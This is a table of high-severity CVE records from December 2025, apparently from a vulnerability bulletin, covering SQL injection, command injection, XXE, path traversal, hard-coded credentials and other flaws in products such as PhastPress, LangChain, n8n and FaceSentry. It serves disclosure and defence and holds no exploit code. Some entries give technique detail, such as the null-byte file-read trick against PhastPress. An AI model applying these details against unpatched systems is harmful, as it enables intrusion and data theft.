| itsourcecode--Online Frozen Foods Ordering System | A vulnerability was identified in itsourcecode Online Frozen Foods Ordering System 1.0. It affects unknown code of the file /customer_details.php. Manipulation leads to SQL injection. The attack can be launched remotely. The exploit is publicly available and may be used. | 2025-12-25 | 7.3 | CVE-2025-15074 | VDB-338331 (itsourcecode Online Frozen Foods Ordering System customer_details.php SQL injection); VDB-338331 CTI Indicators (IOB, IOC, TTP, IOA); Submit #721389 (itsourcecode Online Frozen Foods Ordering System v1.0 SQL Injection); https://github.com/ttting888/CVE/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security flaw has been discovered in itsourcecode Student Management System 1.0. It affects an unknown part of the file /record.php. Manipulation of the argument ID leads to SQL injection. The attack can be executed remotely. The exploit has been released to the public and may be used. | 2025-12-23 | 7.3 | CVE-2025-15034 | VDB-337747 (itsourcecode Student Management System record.php SQL injection); VDB-337747 CTI Indicators (IOB, IOC, TTP, IOA); Submit #720615 (itsourcecode Student Management System V1.0 SQL Injection); https://github.com/ltranquility/CVE/issues/29 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security flaw has been discovered in itsourcecode Student Management System 1.0. It affects unknown processing of the file /student_p.php. Manipulation of the argument ID leads to SQL injection. The attack can be initiated remotely. The exploit has been released to the public and may be used. | 2025-12-25 | 7.3 | CVE-2025-15075 | VDB-338332 (itsourcecode Student Management System student_p.php SQL injection); VDB-338332 CTI Indicators (IOB, IOC, TTP, IOA); Submit #721406 (itsourcecode Student Management System V1.0 SQL Injection); https://github.com/ltranquility/CVE/issues/30 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A security vulnerability has been detected in itsourcecode Student Management System 1.0. The affected element is an unknown function of the file /form137.php. Manipulation of the argument ID leads to SQL injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2025-12-25 | 7.3 | CVE-2025-15077 | VDB-338334 (itsourcecode Student Management System form137.php SQL injection); VDB-338334 CTI Indicators (IOB, IOC, TTP, IOA); Submit #721484 (itsourcecode Student Management System V1.0 SQL Injection); https://github.com/BUPT424201/CVE/issues/2 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was detected in itsourcecode Student Management System 1.0. The impacted element is an unknown function of the file /list_report.php. Manipulation of the argument sy leads to SQL injection. The attack may be launched remotely. The exploit is now public and may be used. | 2025-12-25 | 7.3 | CVE-2025-15078 | VDB-338335 (itsourcecode Student Management System list_report.php SQL injection); VDB-338335 CTI Indicators (IOB, IOC, TTP, IOA); Submit #721485 (itsourcecode Student Management System V1.0 SQL Injection); https://github.com/BUPT424201/CVE/issues/3 https://itsourcecode.com/ |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry 6.4.8 contains an authenticated remote command injection vulnerability in pingTest.php and tcpPortTest.php scripts. Attackers can exploit unsanitized input parameters to inject and execute arbitrary shell commands with root privileges by manipulating the 'strInIP' and 'strInPort' parameters. | 2025-12-24 | 8.8 | CVE-2019-25243 | ExploitDB-47064 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5523) |
| iWT Ltd.--FaceSentry Access Control System | FaceSentry Access Control System 6.4.8 contains a critical authentication vulnerability with hard-coded SSH credentials for the wwwuser account. Attackers can leverage the insecure sudoers configuration to escalate privileges and gain root access by executing sudo commands without authentication. | 2025-12-24 | 7.5 | CVE-2019-25241 | ExploitDB-47067 Vendor Product Homepage Zero Science Lab Disclosure (ZSL-2019-5526) |
| jackq--XCMS | A flaw has been found in jackq XCMS up to commit 3fab5342cc509945a7ce1b8ec39d19f701b89261. It impacts an unknown function of the file Public/javascripts/admin/plupload-2.1.2/examples/upload.php. Manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been published and may be used. This product uses a rolling release to provide continuous delivery, so no version details for affected or updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-27 | 7.3 | CVE-2025-15109 | VDB-338480 (jackq XCMS upload.php unrestricted upload); VDB-338480 CTI Indicators (IOB, IOC, TTP, IOA); Submit #711696 (XCMS 1.0 Unrestricted Upload); https://gitee.com/jackq/XCMS/issues/IDC4ZT |
| kermitproject--C-Kermit | C-Kermit (aka ckermit) through 10.0 Beta.12 (aka 416-beta12) before 244644d allows a remote Kermit system to overwrite files on the local system, or retrieve arbitrary files from the local system. | 2025-12-24 | 8.9 | CVE-2025-68920 | https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123025 https://github.com/KermitProject/ckermit/pull/20 https://www.kermitproject.org/ftp/kermit/test/tar/ https://www.complete.org/kermit/ |
| kiboit--PhastPress | The PhastPress plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Read via null byte injection in all versions up to, and including, 3.7. This is due to a discrepancy between the extension validation in `getExtensionForURL()` which operates on URL-decoded paths, and `appendNormalized()` which strips everything after a null byte before constructing the filesystem path. This makes it possible for unauthenticated attackers to read arbitrary files from the webroot, including wp-config.php, by appending a double URL-encoded null byte (%2500) followed by an allowed extension (.txt) to the file path. | 2025-12-23 | 9.8 | CVE-2025-14388 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eec9bbc0-5a68-4624-a672-bd6227d6fa45?source=cve https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9641 https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9608 https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9570 https://plugins.trac.wordpress.org/browser/phastpress/tags/3.6/sdk/phast.php#L9597 https://plugins.trac.wordpress.org/changeset/3418139 |
| KYOCERA Corporation--KYOCERA Net Admin | KYOCERA Net Admin 3.4.0906 contains an XML External Entity (XXE) injection vulnerability in the Multi-Set Template Editor that allows unauthenticated attackers to read arbitrary system files. Attackers can craft a malicious XML file with external entity references to retrieve sensitive configuration data like database credentials through an out-of-band channel attack. | 2025-12-24 | 7.5 | CVE-2019-25253 | ExploitDB-44430 Kyocera Official Website Zero Science Lab Disclosure (ZSL-2018-5459) |
| langchain-ai--langchain | LangChain is a framework for building agents and LLM-powered applications. Prior to versions 0.3.81 and 1.2.5, a serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions. The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data. This issue has been patched in versions 0.3.81 and 1.2.5. | 2025-12-23 | 9.3 | CVE-2025-68664 | https://github.com/langchain-ai/langchain/security/advisories/GHSA-c67j-w6g6-q2cm https://github.com/langchain-ai/langchain/pull/34455 https://github.com/langchain-ai/langchain/pull/34458 https://github.com/langchain-ai/langchain/commit/5ec0fa69de31bbe3d76e4cf9cd65a6accb8466c8 https://github.com/langchain-ai/langchain/commit/d9ec4c5cc78960abd37da79b0250f5642e6f0ce6 https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.81 https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.5 |
| langchain-ai--langchainjs | LangChain is a framework for building LLM-powered applications. Prior to @langchain/core versions 0.3.80 and 1.1.8, and prior to langchain versions 0.3.37 and 1.2.3, a serialization injection vulnerability exists in LangChain JS's toJSON() method (and therefore also whenever objects are stringified with JSON.stringify()). The method did not escape objects with 'lc' keys when serializing free-form data in kwargs. The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data. This issue has been patched in @langchain/core versions 0.3.80 and 1.1.8, and langchain versions 0.3.37 and 1.2.3. | 2025-12-23 | 8.6 | CVE-2025-68665 | https://github.com/langchain-ai/langchainjs/security/advisories/GHSA-r399-636x-v7f6 https://github.com/langchain-ai/langchainjs/commit/e5063f9c6e9989ea067dfdff39262b9e7b6aba62 https://github.com/langchain-ai/langchainjs/releases/tag/%40langchain%2Fcore%401.1.8 https://github.com/langchain-ai/langchainjs/releases/tag/langchain%401.2.3 |
| Leica Geosystems AG--GR10/GR25/GR30/GR50 GNSS | Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 contains a stored cross-site scripting vulnerability in the configuration file upload functionality. Attackers can upload a malicious HTML file that executes arbitrary JavaScript in a user's browser session when viewed. | 2025-12-24 | 7.2 | CVE-2018-25131 | ExploitDB-46091 Leica Geosystems Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5503) |
| lemon8866--StreamVault | StreamVault is a video download integration solution. Prior to version 251126, a Remote Code Execution (RCE) vulnerability exists in the stream-vault application (SpiritApplication). The application allows administrators to configure yt-dlp arguments via the /admin/api/saveConfig endpoint without sufficient validation. These arguments are stored globally and subsequently used in YtDlpUtil.java when constructing the command line to execute yt-dlp. This issue has been patched in version 251126. | 2025-12-26 | 10 | CVE-2025-66203 | https://github.com/lemon8866/StreamVault/security/advisories/GHSA-c747-q388-3v6m https://github.com/lemon8866/StreamVault/releases/tag/251226 |
| LogicalDOC Srl--LogicalDOC Enterprise | LogicalDOC Enterprise 7.7.4 contains multiple post-authentication file disclosure vulnerabilities that allow attackers to read arbitrary files through unverified 'suffix' and 'fileVersion' parameters. Attackers can exploit directory traversal techniques in /thumbnail and /convertpdf endpoints to access sensitive system files like win.ini and /etc/passwd by manipulating path traversal sequences. | 2025-12-24 | 7.5 | CVE-2019-25258 | ExploitDB-44019 LogicalDOC Official Product Homepage Zero Science Lab Disclosure (ZSL-2018-5450) |
| luiswang--WebTareas | WebTareas 2.4 contains a file upload vulnerability that allows authenticated users to upload malicious PHP files through the chat photo upload functionality. Attackers can upload a PHP file with arbitrary code to the /files/Messages/ directory and execute it directly through the generated file path. | 2025-12-22 | 8.8 | CVE-2023-53971 | ExploitDB-51089 WebTareas Project Homepage VulnCheck Advisory: WebTareas 2.4 Authenticated Remote Code Execution via File Upload |
| luiswang--WebTareas | WebTareas 2.4 contains a SQL injection vulnerability in the webTareasSID cookie parameter that allows unauthenticated attackers to manipulate database queries. Attackers can exploit error-based and time-based blind SQL injection techniques to extract database information and potentially access sensitive system data. | 2025-12-22 | 7.5 | CVE-2023-53972 | ExploitDB-51087 WebTareas Project Homepage VulnCheck Advisory: WebTareas 2.4 Unauthenticated SQL Injection via Session Cookie Parameter |
| Mattermost--Mattermost | Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 with the Jira plugin enabled and Mattermost Jira plugin versions <=4.4.0 fail to enforce authentication and issue-key path restrictions in the Jira plugin, which allows an unauthenticated attacker who knows a valid user ID to issue authenticated GET and POST requests to the Jira server via crafted plugin payloads that spoof the user ID and inject arbitrary issue key paths. Mattermost Advisory ID: MMSA-2025-00555 | 2025-12-22 | 7.2 | CVE-2025-14273 | https://mattermost.com/security-updates |
| MegaSys Computer Technologies--Telenium Online Web Application | Telenium Online Web Application is vulnerable due to a Perl script that is called to load the login page. Due to improper input validation, an attacker can inject arbitrary Perl code through a crafted HTTP request, leading to remote code execution on the server. | 2025-12-24 | 9.8 | CVE-2025-8769 | https://megasys.com/support/ https://www.cisa.gov/news-events/ics-advisories/icsa-24-263-04 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2024/icsa-24-263-04.json |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak | Microhard Systems IPn4G 1.1.0 contains a service vulnerability that allows authenticated users to enable a restricted SSH shell with a default 'msshc' user. Attackers can exploit a custom 'ping' command in the NcFTP environment to escape the restricted shell and execute commands with root privileges. | 2025-12-24 | 8.8 | CVE-2018-25143 | ExploitDB-45041 Microhard Systems Product Homepage Zero Science Lab Disclosure (ZSL-2018-5486) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials | Microhard Systems IPn4G 1.1.0 contains hardcoded default credentials that cannot be changed through normal gateway operations. Attackers can exploit these default credentials to gain unauthorized root-level access to the device by logging in with predefined username and password combinations. | 2025-12-24 | 7.5 | CVE-2018-25147 | ExploitDB-45040 Microhard Systems Product Homepage Zero Science Lab Disclosure (ZSL-2018-5480) |
| Microhard Systems--Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit | Microhard Systems IPn4G 1.1.0 contains multiple authenticated remote code execution vulnerabilities in the admin interface that allow attackers to create crontab jobs and modify system startup scripts. Attackers can exploit hidden admin features to execute arbitrary commands with root privileges, including starting services, disabling firewalls, and writing files to the system. | 2025-12-24 | 8.8 | CVE-2018-25148 | ExploitDB-45038 Microhard Systems Product Web Page Zero Science Lab Disclosure (ZSL-2018-5479) |
| Mitsubishi Electric Europe--smartRTU | A remote unauthenticated attacker may be able to bypass authentication by utilizing a specific API route to execute arbitrary OS commands. | 2025-12-24 | 7.5 | CVE-2025-3232 | https://emea.mitsubishielectric.com/fa/products/quality/quality-news-information https://www.cisa.gov/news-events/ics-advisories/icsa-25-105-09 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-105-09.json |
| Mybb--MyBB | MyBB 1.8.32 contains a chained vulnerability that allows authenticated administrators to bypass avatar upload restrictions and execute arbitrary code. Attackers can modify upload path settings, upload a malicious PHP-embedded image file, and execute commands through the language configuration editing interface. | 2025-12-22 | 8.8 | CVE-2023-53979 | ExploitDB-51213 Official MyBB Vendor Homepage Researcher Disclosure VulnCheck Advisory: MyBB 1.8.32 Authenticated Remote Code Execution via Chained Vulnerabilities |
| Keycloak--Keycloak | A flaw was found in Keycloak. This vulnerability allows an unauthenticated remote attacker to cause a denial of service (DoS) by repeatedly initiating TLS 1.2 client-initiated renegotiation requests to exhaust server CPU resources, making the service unavailable. | 2025-12-23 | 7.5 | CVE-2025-11419 | RHSA-2025:18254 RHSA-2025:18255 RHSA-2025:18889 RHSA-2025:18890 https://access.redhat.com/security/cve/CVE-2025-11419 RHBZ#2402142 |
| PuneethReddyHC--PuneethReddyHC event-management 1.0 | Improper input handling in /Grocery/search_products_itname.php in PuneethReddyHC event-management 1.0 permits SQL injection via the sitem_name POST parameter. Crafted payloads can alter query logic and disclose database contents. Exploitation may result in sensitive data disclosure and backend compromise. | 2025-12-23 | 9.8 | CVE-2025-65354 | https://www.notion.so/JD-Cloud-Unauth-RCE-2d22b76e8e0c802c975bf186b208d0c2 |
| n8n-io--n8n | n8n is an open source workflow automation platform. From version 1.0.0 to before 2.0.0, a sandbox bypass vulnerability exists in the Python Code Node that uses Pyodide. An authenticated user with permission to create or modify workflows can exploit this vulnerability to execute arbitrary commands on the host system running n8n, using the same privileges as the n8n process. This issue has been patched in version 2.0.0. Any one of the following workarounds applies: disabling the Code Node by setting the environment variable NODES_EXCLUDE: "[\"n8n-nodes-base.code\"]"; disabling Python support in the Code node by setting the environment variable N8N_PYTHON_ENABLED=false, which was introduced in n8n version 1.104.0; or configuring n8n to use the task-runner-based Python sandbox via the N8N_RUNNERS_ENABLED and N8N_NATIVE_PYTHON_RUNNER environment variables. | 2025-12-26 | 9.9 | CVE-2025-68668 | https://github.com/n8n-io/n8n/security/advisories/GHSA-62r4-hw23-cc8v |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to version 1.114.0, a stored Cross-Site Scripting (XSS) vulnerability may occur in n8n when using the "Respond to Webhook" node. When this node responds with HTML content containing executable scripts, the payload may execute directly in the top-level window, rather than within the expected sandbox introduced in version 1.103.0. This behavior can enable a malicious actor with workflow creation permissions to execute arbitrary JavaScript in the context of the n8n editor interface. This issue has been patched in version 1.114.0. Workarounds for this issue involve restricting workflow creation and modification privileges to trusted users only, avoiding use of untrusted HTML responses in the "Respond to Webhook" node, and using an external reverse proxy or HTML sanitizer to filter responses that include executable scripts. | 2025-12-26 | 7.3 | CVE-2025-61914 | https://github.com/n8n-io/n8n/security/advisories/GHSA-58jc-rcg5-95f3 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to version 2.0.0, in self-hosted n8n instances where the Code node runs in legacy (non-task-runner) JavaScript execution mode, authenticated users with workflow editing access can invoke internal helper functions from within the Code node. This allows a workflow editor to perform actions on the n8n host with the same privileges as the n8n process, including reading files from the host filesystem (subject to any file-access restrictions configured on the instance and OS/container permissions) and writing files to the host filesystem (subject to the same restrictions). This issue has been patched in version 2.0.0. Workarounds for this issue involve limiting file operations by setting N8N_RESTRICT_FILE_ACCESS_TO to a dedicated directory (e.g., ~/.n8n-files) and ensuring it contains no sensitive data, keeping N8N_BLOCK_FILE_ACCESS_TO_N8N_FILES=true (the default) to block access to .n8n and user-defined config files, and disabling high-risk nodes (including the Code node) using NODES_EXCLUDE if workflow editors are not fully trusted. | 2025-12-26 | 7.1 | CVE-2025-68697 | https://github.com/n8n-io/n8n/security/advisories/GHSA-j4p8-h8mh-rh8q |
| nanbingxyz--5ire | 5ire is a cross-platform desktop artificial intelligence assistant and model context protocol client. In versions 0.15.2 and prior, an RCE vulnerability exists in useMarkdown.ts, where the markdown-it-mermaid plugin is initialized with securityLevel: 'loose'. This configuration explicitly permits the rendering of HTML tags within Mermaid diagram nodes. This issue has not been patched at time of publication. | 2025-12-23 | 9.7 | CVE-2025-68669 | https://github.com/nanbingxyz/5ire/security/advisories/GHSA-5hpf-p8fw-j349 https://github.com/nanbingxyz/5ire/blob/c40d05a2b546094789fc727daa5383bb15034442/src/hooks/useMarkdown.ts#L156 https://github.com/nanbingxyz/5ire/releases/tag/v0.15.2 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an Edge Messaging Platform. Prior to version 0.24.2, a classic data race on the subscription info list could result in a heap use-after-free crash. This issue has been patched in version 0.24.2. | 2025-12-27 | 7.5 | CVE-2025-59946 | https://github.com/nanomq/nanomq/security/advisories/GHSA-xg37-23w7-72p5 https://github.com/nanomq/nanomq/issues/1863 |
| net-snmp--net-snmp | net-snmp is an SNMP application library, set of tools and daemon. Prior to versions 5.9.5 and 5.10.pre2, a specially crafted packet sent to a net-snmp snmptrapd daemon can cause a buffer overflow and crash the daemon. This issue has been patched in versions 5.9.5 and 5.10.pre2. | 2025-12-22 | 9.8 | CVE-2025-68615 | https://github.com/net-snmp/net-snmp/security/advisories/GHSA-4389-rwqf-q9gq |
| NetBT Consulting Services Inc.--e-Fatura | Unquoted Search Path or Element vulnerability in NetBT Consulting Services Inc. E-Fatura allows Leveraging/Manipulating Configuration File Search Paths, Redirect Access to Libraries. This issue affects e-Fatura: before 1.2.15. | 2025-12-22 | 7.3 | CVE-2025-14018 | https://www.usom.gov.tr/bildirim/tr-25-0474 |
| NovaRad Corporation--NovaPACS Diagnostics Viewer | NovaRad NovaPACS Diagnostics Viewer 8.5.19.75 contains an unauthenticated XML External Entity (XXE) injection vulnerability in XML preference import settings. Attackers can craft malicious XML files with DTD parameter entities to retrieve arbitrary system files through an out-of-band channel attack. | 2025-12-24 | 9.8 | CVE-2018-25142 | ExploitDB-45337 NovaRad Corporation Product Homepage Zero Science Lab Disclosure (ZSL-2018-5488) |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable contains a vulnerability where an attacker could exploit a hard-coded credential issue. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, and data tampering. | 2025-12-23 | 9.8 | CVE-2025-33222 | https://nvd.nist.gov/vuln/detail/CVE-2025-33222 https://www.cve.org/CVERecord?id=CVE-2025-33222 https://nvidia.custhelp.com/app/answers/detail/a_id/5749 |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable contains a vulnerability where an attacker could cause an execution with unnecessary privileges. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure and data tampering. | 2025-12-23 | 9.8 | CVE-2025-33223 | https://nvd.nist.gov/vuln/detail/CVE-2025-33223 https://www.cve.org/CVERecord?id=CVE-2025-33223 https://nvidia.custhelp.com/app/answers/detail/a_id/5749 |
| NVIDIA--Isaac Launchable | NVIDIA Isaac Launchable contains a vulnerability where an attacker could cause an execution with unnecessary privileges. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure and data tampering. | 2025-12-23 | 9.8 | CVE-2025-33224 | https://nvd.nist.gov/vuln/detail/CVE-2025-33224 https://www.cve.org/CVERecord?id=CVE-2025-33224 https://nvidia.custhelp.com/app/answers/detail/a_id/5749 |
| OpenOps--OpenOps | OpenOps before 0.6.11 allows remote code execution in the Terraform block. | 2025-12-24 | 7.4 | CVE-2025-68922 | https://github.com/openops-cloud/openops/pull/1767 https://linear.app/openops/issue/OPS-3254 https://github.com/openops-cloud/openops/releases/tag/0.6.11 https://github.com/openops-cloud/openops/compare/0.6.10...0.6.11 |
| Orangescrum--orangescrum | Orangescrum 1.8.0 contains a privilege escalation vulnerability that allows authenticated users to take over other project-assigned accounts by manipulating session cookies. Attackers can extract the victim's unique ID from the page source and replace their own session cookie to gain unauthorized access to another user's account. | 2025-12-23 | 8.8 | CVE-2021-47721 | ExploitDB-50551 Official Product Homepage VulnCheck Advisory: Orangescrum 1.8.0 Authenticated Privilege Escalation via User Session Manipulation |
| Orangescrum--orangescrum | Orangescrum 1.8.0 contains an authenticated SQL injection vulnerability that allows authorized users to manipulate database queries through multiple vulnerable parameters. Attackers can inject malicious SQL code into parameters like old_project_id, project_id, uuid, and uniqid to potentially extract or modify database information. | 2025-12-23 | 7.1 | CVE-2021-47720 | ExploitDB-50553 Official Product Homepage VulnCheck Advisory: Orangescrum 1.8.0 Authenticated SQL Injection via Multiple Parameters |
| Pexip--Infinity | Pexip Infinity 15.0 through 38.0 before 38.1 has Improper Access Control in the Secure Scheduler for Exchange service, when used with Office 365 Legacy Exchange Tokens. This allows a remote attacker to read potentially sensitive data and excessively consume resources, leading to a denial of service. | 2025-12-25 | 8.2 | CVE-2025-59683 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity before 37.0 has improper input validation in signalling that allows a remote attacker to trigger a software abort via a crafted signalling message, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-32095 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 33.0 through 37.0 before 37.1 has improper input validation in signaling that allows an attacker to trigger a software abort, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-32096 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 35.0 through 37.2 before 38.0 has Improper Input Validation in signalling that allows an attacker to trigger a software abort, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-48704 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity before 39.0 has Missing Authentication for a Critical Function in a product-internal API, allowing an attacker (who already has access to execute code on one node within a Pexip Infinity installation) to impact the operation of other nodes within the installation. | 2025-12-25 | 7.5 | CVE-2025-66377 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity before 39.0 has Improper Input Validation in the media implementation, allowing a remote attacker to trigger a software abort via a crafted media stream, resulting in a denial of service. | 2025-12-25 | 7.5 | CVE-2025-66379 | https://docs.pexip.com/admin/security_bulletins.htm |
| Pexip--Infinity | Pexip Infinity 35.0 through 38.1 before 39.0, in non-default configurations that use Direct Media for WebRTC, has Improper Input Validation in signalling that allows an attacker to trigger a software abort, resulting in a temporary denial of service. | 2025-12-25 | 7.5 | CVE-2025-66443 | https://docs.pexip.com/admin/security_bulletins.htm |
| ProjectSend--projectSend | ProjectSend r1605 contains a remote code execution vulnerability that allows attackers to upload malicious files by manipulating file extensions. Attackers can upload shell scripts with disguised extensions through the upload.process.php endpoint to execute arbitrary commands on the server. | 2025-12-22 | 9.8 | CVE-2023-53980 | ExploitDB-51238 Official Product Homepage VulnCheck Advisory: ProjectSend r1605 Remote Code Execution via File Extension Manipulation |
| Ragic--Enterprise Cloud Database | Enterprise Cloud Database developed by Ragic has a Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information and log into the system as any user. | 2025-12-22 | 9.8 | CVE-2025-15016 | https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html |
| Ragic--Enterprise Cloud Database | Enterprise Cloud Database developed by Ragic has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to download arbitrary system files. | 2025-12-22 | 7.5 | CVE-2025-15015 | https://www.twcert.org.tw/tw/cp-132-10587-797c6-1.html https://www.twcert.org.tw/en/cp-139-10588-771e5-2.html |
| Riello--NetMan | Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/certsupload.cgi /../ directory traversal for file upload with resultant code execution. | 2025-12-24 | 9.1 | CVE-2025-68916 | https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025 |
| Rifatron Co., Ltd.--DVR | Rifatron 5brid DVR contains an unauthenticated vulnerability in the animate.cgi script that allows unauthorized access to live video streams. Attackers can exploit the Mobile Web Viewer module by specifying channel numbers to retrieve sequential video snapshots without authentication. | 2025-12-24 | 9.8 | CVE-2019-25240 | ExploitDB-47368 Rifatron Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5532) |
| Ross Video Ltd.--DashBoard | Ross Video DashBoard 8.5.1 contains an elevation of privileges vulnerability that allows authenticated users to modify executable files due to improper permission settings. Attackers can exploit the 'M' or 'C' flags for 'Authenticated Users' group to replace the DashBoard.exe binary with a malicious executable. | 2025-12-24 | 8.8 | CVE-2019-25245 | ExploitDB-46742 Ross Video Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5516) |
| Ruben Garcia--AutomatorWP | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ruben Garcia AutomatorWP allows SQL Injection. This issue affects AutomatorWP: from n/a through 5.2.4. | 2025-12-23 | 7.6 | CVE-2025-68561 | https://vdp.patchstack.com/database/wordpress/plugin/automatorwp/vulnerability/wordpress-automatorwp-plugin-5-2-4-sql-injection-vulnerability?_s_id=cve |
| saiftheboss7--onlinemcqexam | A vulnerability was found in saiftheboss7 onlinemcqexam up to 0e56806132971e49721db3ef01868098c7b42ada. This vulnerability affects unknown code of the file /admin/quesadd.php. Manipulation of the argument ans1/ans2 results in SQL injection. The attack can be carried out remotely. The exploit has been made public and could be used. This product adopts a rolling release strategy to maintain continuous delivery. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-28 | 7.3 | CVE-2025-15140 | VDB-338518 \| saiftheboss7 onlinemcqexam quesadd.php sql injection VDB-338518 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #715219 \| Github Online MCQ EXAM V1.0 SQL Injection Submit #715463 \| github.com An online MCQ Exam system v1.0 SQL Injection (Duplicate) https://github.com/Anti1i/cve/issues/4 |
| Sigb--PMB | PMB 7.4.6 contains a SQL injection vulnerability in the storage parameter of the ajax.php endpoint that allows remote attackers to manipulate database queries. Attackers can exploit the unsanitized 'id' parameter by injecting conditional sleep statements to extract information or perform time-based blind SQL injection attacks. | 2025-12-23 | 8.2 | CVE-2023-53982 | ExploitDB-51197 Vendor Homepage Software Download Repository VulnCheck Advisory: PMB 7.4.6 SQL Injection Vulnerability via Unsanitized Storage Parameter |
| simstudioai--sim | A vulnerability was identified in simstudioai sim up to 0.5.27. This vulnerability affects unknown code of the file apps/sim/lib/auth/internal.ts of the component CRON Secret Handler. The manipulation of the argument INTERNAL_API_SECRET leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The identifier of the patch is e359dc2946b12ed5e45a0ec9c95ecf91bd18502a. Applying a patch is the recommended action to fix this issue. | 2025-12-26 | 7.3 | CVE-2025-15099 | VDB-338430 \| simstudioai sim CRON Secret internal.ts improper authentication VDB-338430 \| CTI Indicators (IOB, IOC, IOA) Submit #710255 \| https://github.com/simstudioai https://github.com/simstudioai/sim ≤ v0.5.21 Authentication Bypass by Primary Weakness https://gist.github.com/H2u8s/c533741e1b36f6245d41cace89a7f4d2 https://github.com/simstudioai/sim/pull/2343 https://gist.github.com/H2u8s/c533741e1b36f6245d41cace89a7f4d2#-steps-to-reproduce https://github.com/simstudioai/sim/commit/e359dc2946b12ed5e45a0ec9c95ecf91bd18502a |
| Smartwares--Smartwares HOME easy | Smartwares HOME easy 1.0.9 contains an authentication bypass vulnerability that allows unauthenticated attackers to access administrative web pages by disabling JavaScript. Attackers can navigate to multiple administrative endpoints, bypass client-side validation, and access sensitive system information. | 2025-12-24 | 9.8 | CVE-2019-25235 | ExploitDB-47595 Official Product Homepage Zero Science Lab Disclosure (ZSL-2019-5540) |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains multiple SQL injection vulnerabilities that allow attackers to manipulate database queries through unvalidated POST parameters. Attackers can bypass authentication, retrieve password hashes, and gain administrative access with full system privileges by exploiting injection flaws in Login.php and Card_Edit_GetJson.php. | 2025-12-24 | 8.2 | CVE-2018-25128 | ExploitDB-46833 SOCA Technology Product Homepage Zero Science Lab Disclosure (ZSL-2019-5519) |
| SOCA Technology Co., Ltd--SOCA Access Control System | SOCA Access Control System 180612 contains multiple insecure direct object reference vulnerabilities that allow attackers to access sensitive user credentials. Attackers can retrieve authenticated and unauthenticated user password hashes and pins through unprotected endpoints like Get_Permissions_From_DB.php and Ac10_ReadSortCard. | 2025-12-24 | 7.5 | CVE-2018-25129 | ExploitDB-46832 SOCA Technology Product Homepage Zero Science Lab Disclosure (ZSL-2019-5517) |
